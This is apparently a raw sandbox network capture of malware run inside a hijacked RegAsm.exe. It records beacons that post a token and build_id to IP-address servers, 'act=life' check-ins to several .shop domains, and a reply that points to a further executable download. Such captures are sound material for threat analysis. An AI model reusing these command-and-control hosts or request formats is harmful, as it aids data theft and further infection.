2024-09-20 09:07:58 UTC	16355	OUT	Data Raw: 41 67 4e 48 4b 2b 77 37 46 75 6c 71 6d 4e 53 73 38 2f 77 43 73 66 2f 76 6d 6e 66 32 6e 5a 44 2f 6c 6f 2f 38 41 33 7a 52 79 76 73 49 73 39 36 30 4e 4a 2f 34 2f 78 2f 75 50 2f 77 43 67 6d 73 62 2b 30 37 45 39 5a 58 48 2f 41 41 47 70 37 58 57 72 4f 32 6d 38 31 5a 47 4a 43 73 41 43 76 71 43 4b 7a 71 30 35 53 67 30 6b 4b 7a 4f 5a 66 72 30 7a 55 5a 50 34 30 35 32 79 61 6a 4e 65 6f 74 49 6f 36 49 6f 51 6d 6d 48 33 70 57 39 36 61 54 55 74 6d 69 44 76 53 45 35 7a 52 6e 6e 70 53 47 70 5a 51 68 34 47 63 2f 68 53 64 73 30 70 2f 77 41 6d 6b 37 64 4b 68 73 70 44 61 51 6a 41 36 55 74 46 49 59 33 4e 48 61 6c 70 75 61 51 78 61 62 37 30 70 70 44 53 47 68 44 53 66 57 6c 49 4f 66 58 30 70 4f 6c 49 6f 54 48 72 30 6f 37 55 66 68 51 65 68 6f 47 6a 30 43 69 6a 46 46 59 48 79 5a Data Ascii: AgNHK+w7FulqmNSs8/wCsf/vmnf2nZD/lo/8A3zRyvsIs960NJ/4/x/uP/wCgmsb+07E9ZXH/AAGp7XWrO2m81ZGJCsACvqCKzq05Sg0kKzOZfr0zUZP4052yajNeotIo6IoQmmH3pW96aTUtmiDvSE5zRnnpSGpZQh4Gc/hSds0p/wAmk7dKhspDaQjA6UtFIY3NHalpuaQxab70ppDSGhDSfWlIOfX0pOlIoTHr0o7UfhQehoGj0CijFFYHyZ
2024-09-20 09:07:58 UTC	16355	OUT	Data Raw: 6c 61 2b 54 39 6c 55 66 4e 35 68 33 52 52 2f 63 32 35 50 71 4d 6a 50 4e 56 2f 61 4b 30 39 33 64 58 2b 58 39 66 38 4f 52 2f 59 30 74 62 54 32 66 4c 74 31 2b 2f 2f 41 49 50 6b 61 4e 46 55 72 61 65 61 58 55 62 79 4b 53 33 4e 75 74 71 2f 32 64 59 32 78 75 77 76 47 35 73 63 45 74 31 7a 7a 31 34 34 78 56 61 36 31 69 33 30 35 62 47 57 37 6a 55 52 76 71 56 7a 41 5a 66 4b 44 37 43 49 59 2f 4c 5a 6c 2f 69 56 58 62 4a 58 30 7a 77 65 68 30 6e 6a 6f 51 6f 4b 74 62 52 6d 46 4c 4b 35 31 4d 56 4c 44 4b 53 76 48 64 2b 6d 35 72 55 56 68 58 47 71 36 72 70 75 6c 36 70 64 79 52 61 54 4c 64 45 32 52 68 75 49 72 61 4e 34 5a 49 33 45 78 33 4b 72 4a 68 63 37 41 44 38 71 6e 4b 38 6a 4f 61 75 76 72 46 6c 62 4a 71 63 6c 35 44 46 62 77 7a 6a 54 73 73 71 6b 2f 59 6e 6e 69 6b 59 6c 63 Data Ascii: la+T9lUfN5h3RR/c25PqMjPNV/aK093dX+X9f8OR/Y0tbT2fLt1+//AIPkaNFUraeaXUbyKS3Nutq/2dY2xuwvG5scEt1zz144xVa61i305bGW7jURvqVzAZfKD7CIY/LZl/iVXbJX0zweh0njoQoKtbRmFLK51MVLDKSvHd+m5rUVhXGq6rpul6pdyRaTLdE2RhuIraN4ZI3Ex3KrJhc7AD8qnK8jOauvrFlbJqcl5DFbwzjTssqk/YnnikYlc
2024-09-20 09:07:58 UTC	16355	OUT	Data Raw: 35 5a 77 61 68 34 68 73 37 53 36 51 76 42 49 58 33 71 47 4b 35 77 6a 45 63 6a 6e 71 42 58 6f 50 2f 43 46 2b 48 2f 2b 66 46 76 2f 41 41 49 6b 2f 77 44 69 71 38 33 45 35 6a 47 68 55 35 48 47 35 37 4f 42 79 57 70 69 36 50 74 59 79 53 50 4b 71 4b 39 56 2f 77 43 45 4c 38 50 2f 41 50 50 69 33 2f 67 52 4a 2f 38 41 46 56 69 61 35 34 4e 74 57 75 6f 4c 66 53 59 2f 49 6d 4d 45 30 75 47 6b 5a 68 49 56 61 4d 41 66 4d 54 6a 37 78 72 43 4f 63 55 32 39 59 73 36 70 63 4e 31 6c 46 75 4d 30 32 63 4c 52 54 70 49 33 69 6c 65 4b 56 47 6a 6b 51 37 58 52 68 67 71 66 53 6d 31 36 30 5a 4b 53 55 6f 75 36 5a 38 39 4f 45 71 63 6e 43 61 73 30 46 4a 32 70 61 53 71 45 46 46 46 46 41 42 52 52 52 51 41 6c 46 46 46 41 42 51 61 4b 53 6d 41 55 55 55 55 44 43 6b 6f 6f 6f 41 4b 4b 4b 4b 59 41 Data Ascii: 5Zwah4hs7S6QvBIX3qGK5wjEcjnqBXoP/CF+H/+fFv/AAIk/wDiq83E5jGhU5HG57OByWpi6PtYySPKqK9V/wCEL8P/APPi3/gRJ/8AFVia54NtWuoLfSY/ImME0uGkZhIVaMAfMTj7xrCOcU29Ys6pcN1lFuM02cLRTpI3ileKVGjkQ7XRhgqfSm160ZKSUou6Z89OEqcnCas0FJ2paSqEFFFFABRRRQAlFFFABQaKSmAUUUUDCkoooAKKKKYA
2024-09-20 09:07:58 UTC	15984	OUT	Data Raw: 2f 77 41 4a 72 34 66 2f 41 4f 66 35 76 2f 41 65 54 2f 34 6d 76 4a 39 32 47 6b 55 71 34 61 4e 64 30 67 4b 48 4b 44 6a 6b 38 63 44 6b 64 66 57 6a 66 68 4e 35 56 77 6d 41 64 2b 77 37 63 45 6b 44 6e 70 79 56 62 38 6a 36 56 35 48 39 6b 30 66 35 2f 77 41 6a 36 4c 2f 57 44 45 2f 38 2b 76 7a 50 57 50 38 41 68 4e 66 44 2f 77 44 7a 2f 74 2f 34 44 79 66 2f 41 42 4e 48 2f 43 61 2b 48 2f 38 41 6e 2b 62 2f 41 4d 42 35 50 2f 69 61 38 6e 4c 67 4c 75 4b 76 74 32 47 54 64 73 4f 4e 6f 4f 30 74 6e 48 54 50 47 66 57 6e 66 4d 49 7a 4b 59 70 52 47 46 56 79 35 6a 59 4b 46 59 34 55 35 78 6a 42 49 4f 44 33 78 53 2f 73 71 6a 2f 7a 38 2f 49 66 39 76 34 6d 31 2f 5a 66 6d 49 6f 77 69 67 39 68 53 30 68 79 49 6d 6c 32 74 35 61 73 46 5a 77 70 32 67 6e 6f 43 65 6d 54 53 31 37 55 4c 4a 63 Data Ascii: /wAJr4f/AOf5v/AeT/4mvJ92GkUq4aNd0gKHKDjk8cDkdfWjfhN5VwmAd+w7cEkDnpyVb8j6V5H9k0f5/wAj6L/WDE/8+vzPWP8AhNfD/wDz/t/4Dyf/ABNH/Ca+H/8An+b/AMB5P/ia8nLgLuKvt2GTdsONoO0tnHTPGfWnfMIzKYpRGFVy5jYKFY4U5xjBIOD3xS/sqj/z8/If9v4m1/ZfmIowig9hS0hyIml2t5asFZwp2gnoCemTS17ULJc
2024-09-20 09:07:59 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 20 Sep 2024 09:07:59 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-09-20 09:07:59 UTC	12	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a Data Ascii: 2ok0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
23	192.168.2.4	49761	116.203.165.127	443	7516	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-20 09:08:00 UTC	280	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----JDGCGHCGHCBFHJJKKJEH User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 Host: 116.203.165.127 Content-Length: 331 Connection: Keep-Alive Cache-Control: no-cache
2024-09-20 09:08:00 UTC	331	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 4a 44 47 43 47 48 43 47 48 43 42 46 48 4a 4a 4b 4b 4a 45 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 61 65 37 64 35 62 66 34 34 30 61 36 39 33 35 61 35 38 37 32 66 61 32 33 37 31 33 39 62 35 66 36 0d 0a 2d 2d 2d 2d 2d 2d 4a 44 47 43 47 48 43 47 48 43 42 46 48 4a 4a 4b 4b 4a 45 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 64 65 61 37 63 30 31 30 30 37 61 36 35 37 62 61 30 63 36 30 31 63 39 34 31 36 33 32 66 31 34 30 0d 0a 2d 2d 2d 2d 2d 2d 4a 44 47 43 47 48 43 47 48 43 42 46 48 4a 4a 4b 4b 4a 45 48 0d 0a 43 6f 6e 74 Data Ascii: ------JDGCGHCGHCBFHJJKKJEHContent-Disposition: form-data; name="token"ae7d5bf440a6935a5872fa237139b5f6------JDGCGHCGHCBFHJJKKJEHContent-Disposition: form-data; name="build_id"dea7c01007a657ba0c601c941632f140------JDGCGHCGHCBFHJJKKJEHCont
2024-09-20 09:08:00 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 20 Sep 2024 09:08:00 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-09-20 09:08:00 UTC	103	IN	Data Raw: 35 63 0d 0a 4d 54 45 32 4e 6a 4d 35 4e 48 78 6f 64 48 52 77 4f 69 38 76 4d 54 51 33 4c 6a 51 31 4c 6a 51 30 4c 6a 45 77 4e 43 39 77 63 6d 39 6e 4c 7a 59 32 5a 57 4e 69 4e 44 55 30 5a 44 4a 69 4e 47 46 66 62 47 64 6d 5a 48 4e 71 5a 32 52 7a 4c 6d 56 34 5a 58 77 78 66 47 74 72 61 32 74 38 0d 0a 30 0d 0a 0d 0a Data Ascii: 5cMTE2NjM5NHxodHRwOi8vMTQ3LjQ1LjQ0LjEwNC9wcm9nLzY2ZWNiNDU0ZDJiNGFfbGdmZHNqZ2RzLmV4ZXwxfGtra2t80

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
24	192.168.2.4	49763	116.203.165.127	443	7516	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-20 09:08:02 UTC	280	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----HJKKFIJKFCAKJJJKJKFI User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 Host: 116.203.165.127 Content-Length: 499 Connection: Keep-Alive Cache-Control: no-cache
2024-09-20 09:08:02 UTC	499	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 48 4a 4b 4b 46 49 4a 4b 46 43 41 4b 4a 4a 4a 4b 4a 4b 46 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 61 65 37 64 35 62 66 34 34 30 61 36 39 33 35 61 35 38 37 32 66 61 32 33 37 31 33 39 62 35 66 36 0d 0a 2d 2d 2d 2d 2d 2d 48 4a 4b 4b 46 49 4a 4b 46 43 41 4b 4a 4a 4a 4b 4a 4b 46 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 64 65 61 37 63 30 31 30 30 37 61 36 35 37 62 61 30 63 36 30 31 63 39 34 31 36 33 32 66 31 34 30 0d 0a 2d 2d 2d 2d 2d 2d 48 4a 4b 4b 46 49 4a 4b 46 43 41 4b 4a 4a 4a 4b 4a 4b 46 49 0d 0a 43 6f 6e 74 Data Ascii: ------HJKKFIJKFCAKJJJKJKFIContent-Disposition: form-data; name="token"ae7d5bf440a6935a5872fa237139b5f6------HJKKFIJKFCAKJJJKJKFIContent-Disposition: form-data; name="build_id"dea7c01007a657ba0c601c941632f140------HJKKFIJKFCAKJJJKJKFICont
2024-09-20 09:08:03 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 20 Sep 2024 09:08:03 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-09-20 09:08:03 UTC	12	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a Data Ascii: 2ok0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
25	192.168.2.4	49764	172.67.204.62	443	8184	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-20 09:08:04 UTC	263	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: questionmwq.shop
2024-09-20 09:08:04 UTC	8	OUT	Data Raw: 61 63 74 3d 6c 69 66 65 Data Ascii: act=life
2024-09-20 09:08:04 UTC	766	IN	HTTP/1.1 200 OK Date: Fri, 20 Sep 2024 09:08:04 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=2rif27rofekee8fsvuf9o72c23; expires=Tue, 14 Jan 2025 02:54:43 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=8e6Er1UIRN9kscHRO2jPsV3vzqT8ZSX9Z%2B8Zcan7i2AC0PAmkKcqceHo6P4wuRR7cFCNPvD503O2%2FvGthAymceTAVXRUqrbSqu8LzCH17dyGVJQdrS3OMwRmcjJvv2U%2FN4OW"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8c60ab35b8977d05-EWR
2024-09-20 09:08:04 UTC	15	IN	Data Raw: 61 0d 0a 65 72 72 6f 72 20 23 44 31 32 0d 0a Data Ascii: aerror #D12
2024-09-20 09:08:04 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
26	192.168.2.4	49765	116.203.165.127	443	7516	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-20 09:08:04 UTC	280	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----EHIJDHCAKKFCBGCBAAEC User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 Host: 116.203.165.127 Content-Length: 331 Connection: Keep-Alive Cache-Control: no-cache
2024-09-20 09:08:04 UTC	331	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 45 48 49 4a 44 48 43 41 4b 4b 46 43 42 47 43 42 41 41 45 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 61 65 37 64 35 62 66 34 34 30 61 36 39 33 35 61 35 38 37 32 66 61 32 33 37 31 33 39 62 35 66 36 0d 0a 2d 2d 2d 2d 2d 2d 45 48 49 4a 44 48 43 41 4b 4b 46 43 42 47 43 42 41 41 45 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 64 65 61 37 63 30 31 30 30 37 61 36 35 37 62 61 30 63 36 30 31 63 39 34 31 36 33 32 66 31 34 30 0d 0a 2d 2d 2d 2d 2d 2d 45 48 49 4a 44 48 43 41 4b 4b 46 43 42 47 43 42 41 41 45 43 0d 0a 43 6f 6e 74 Data Ascii: ------EHIJDHCAKKFCBGCBAAECContent-Disposition: form-data; name="token"ae7d5bf440a6935a5872fa237139b5f6------EHIJDHCAKKFCBGCBAAECContent-Disposition: form-data; name="build_id"dea7c01007a657ba0c601c941632f140------EHIJDHCAKKFCBGCBAAECCont
2024-09-20 09:08:05 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 20 Sep 2024 09:08:05 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-09-20 09:08:05 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
27	192.168.2.4	49766	104.21.88.61	443	8184	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-20 09:08:04 UTC	263	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: chickerkuso.shop
2024-09-20 09:08:04 UTC	8	OUT	Data Raw: 61 63 74 3d 6c 69 66 65 Data Ascii: act=life
2024-09-20 09:08:05 UTC	768	IN	HTTP/1.1 200 OK Date: Fri, 20 Sep 2024 09:08:05 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=keogctqndfbr69fh8o7slv11o8; expires=Tue, 14 Jan 2025 02:54:44 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=xLlGdN4cUkgIFd6tnaHHkTVqpz2R%2Frifad3Lw7secqMrijMgSvQ5Q4iHev4vnWrwft2wp88%2BPOPJTpjGAjgk20ag9lvD3QUrXkNbOYIDMbmS%2FasrGzIAIB0wjtwJ%2BDl9CzmQ"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8c60ab3b8ead436e-EWR
2024-09-20 09:08:05 UTC	15	IN	Data Raw: 61 0d 0a 65 72 72 6f 72 20 23 44 31 32 0d 0a Data Ascii: aerror #D12
2024-09-20 09:08:05 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
28	192.168.2.4	49768	188.114.97.3	443	8184	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-20 09:08:05 UTC	267	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: achievenmtynwjq.shop
2024-09-20 09:08:05 UTC	8	OUT	Data Raw: 61 63 74 3d 6c 69 66 65 Data Ascii: act=life
2024-09-20 09:08:06 UTC	784	IN	HTTP/1.1 200 OK Date: Fri, 20 Sep 2024 09:08:06 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=6nb352ad1uih7igrdnouft969f; expires=Tue, 14 Jan 2025 02:54:45 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=yAmFv9TLNNBoJLxj8V18dm8fZCUHeUulmAgladcofw%2F%2BcWW1cGYrBjOmN%2FwFKUVs%2BJvrZvhGqX3RCZ8uOza9YPt1mjSM2%2BN2FB7plRM%2FC5cDst418feJ5f6t63qxKQlmCvSqkhgCJg%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8c60ab4178754252-EWR
2024-09-20 09:08:06 UTC	15	IN	Data Raw: 61 0d 0a 65 72 72 6f 72 20 23 44 31 32 0d 0a Data Ascii: aerror #D12
2024-09-20 09:08:06 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
29	192.168.2.4	49769	45.132.206.251	443	7516	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-20 09:08:06 UTC	188	OUT	GET / HTTP/1.1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 Connection: Keep-Alive Cache-Control: no-cache Host: cowod.hopto.org
2024-09-20 09:08:07 UTC	183	IN	HTTP/1.1 200 OK Server: openresty Date: Fri, 20 Sep 2024 09:08:06 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: close X-Served-By: cowod.hopto.org

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
30	192.168.2.4	49770	188.114.97.3	443	8184	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-20 09:08:06 UTC	265	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: puredoffustow.shop
2024-09-20 09:08:06 UTC	8	OUT	Data Raw: 61 63 74 3d 6c 69 66 65 Data Ascii: act=life
2024-09-20 09:08:07 UTC	778	IN	HTTP/1.1 200 OK Date: Fri, 20 Sep 2024 09:08:07 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=9tgjd3t74kkimaulmsau21ff6s; expires=Tue, 14 Jan 2025 02:54:46 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=D%2BfgSl8HtP4GNFcaInhxZOg8%2FRMrBbziQouAOhfAHHOpjXerbP77j0cYTjkwC799QRHa4xTRqmYqxa4KZsB9iAS%2BipoLsPshW1TGntO0g6jgmgvYg%2F8N%2FbwLC0zwz%2BdGBTiuM7E%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8c60ab47690dc3f8-EWR
2024-09-20 09:08:07 UTC	15	IN	Data Raw: 61 0d 0a 65 72 72 6f 72 20 23 44 31 32 0d 0a Data Ascii: aerror #D12
2024-09-20 09:08:07 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
31	192.168.2.4	49771	188.114.97.3	443	8184	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-20 09:08:07 UTC	265	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: opponnentduei.shop
2024-09-20 09:08:07 UTC	8	OUT	Data Raw: 61 63 74 3d 6c 69 66 65 Data Ascii: act=life
2024-09-20 09:08:08 UTC	774	IN	HTTP/1.1 200 OK Date: Fri, 20 Sep 2024 09:08:08 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=l0l0ugmotuj6ep69jj68ovc55a; expires=Tue, 14 Jan 2025 02:54:47 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=xzoH3irY3V4AR95vHtJoYXZ4w1j34eahT%2By3HAJljsVr%2BEuwxIeYw7azQ7X0aScMDFwUmrxbYZjRASwd6YvAS%2FADPh1iQUhShQUYy2Kcbmnr5w97DQO%2FFQfdeBWX6oim5cQmWZY%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8c60ab4d48f617e1-EWR
2024-09-20 09:08:08 UTC	15	IN	Data Raw: 61 0d 0a 65 72 72 6f 72 20 23 44 31 32 0d 0a Data Ascii: aerror #D12
2024-09-20 09:08:08 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
32	192.168.2.4	49772	104.21.75.242	443	8184	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-20 09:08:08 UTC	266	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: metallygaricwo.shop
2024-09-20 09:08:08 UTC	8	OUT	Data Raw: 61 63 74 3d 6c 69 66 65 Data Ascii: act=life
2024-09-20 09:08:09 UTC	768	IN	HTTP/1.1 200 OK Date: Fri, 20 Sep 2024 09:08:09 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=i32vvu7te9ps0cgmf7hp2ps4b4; expires=Tue, 14 Jan 2025 02:54:47 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Rd6q3azlJzPAYSalc96ZAsZsVok71UkwWnQu9MLlKTE6kvNuHsxYf1vrUrwYZuaDyHiynX7mjkrTUihmHRGutGdDhlWQTnU6wZfudZ%2FlIJP4EHCd0aJ9uOW4CUOV%2FXYGofoYwlIa"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8c60ab532e8e8c0b-EWR
2024-09-20 09:08:09 UTC	15	IN	Data Raw: 61 0d 0a 65 72 72 6f 72 20 23 44 31 32 0d 0a Data Ascii: aerror #D12
2024-09-20 09:08:09 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
33	192.168.2.4	49773	188.114.96.3	443	8184	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-20 09:08:09 UTC	266	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: milldymarskwom.shop
2024-09-20 09:08:09 UTC	8	OUT	Data Raw: 61 63 74 3d 6c 69 66 65 Data Ascii: act=life
2024-09-20 09:08:10 UTC	780	IN	HTTP/1.1 200 OK Date: Fri, 20 Sep 2024 09:08:10 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=i79h9o634fg11qvnqbif1fkkrp; expires=Tue, 14 Jan 2025 02:54:49 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=njZVNDREdaoqijLugdXFLYYRVimoO%2BJjgDUlUC3Mc%2FgBjSdtNc6Zc7%2FynYB3ZXhQm5yF%2BdDMxXfxviAQT%2FtteuarLQEAYQyD%2Bq83g0dKaJjolMjI4tPznW7j9ahr89m%2BHlG9CPR%2B"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8c60ab59f8e342df-EWR
2024-09-20 09:08:10 UTC	15	IN	Data Raw: 61 0d 0a 65 72 72 6f 72 20 23 44 31 32 0d 0a Data Ascii: aerror #D12
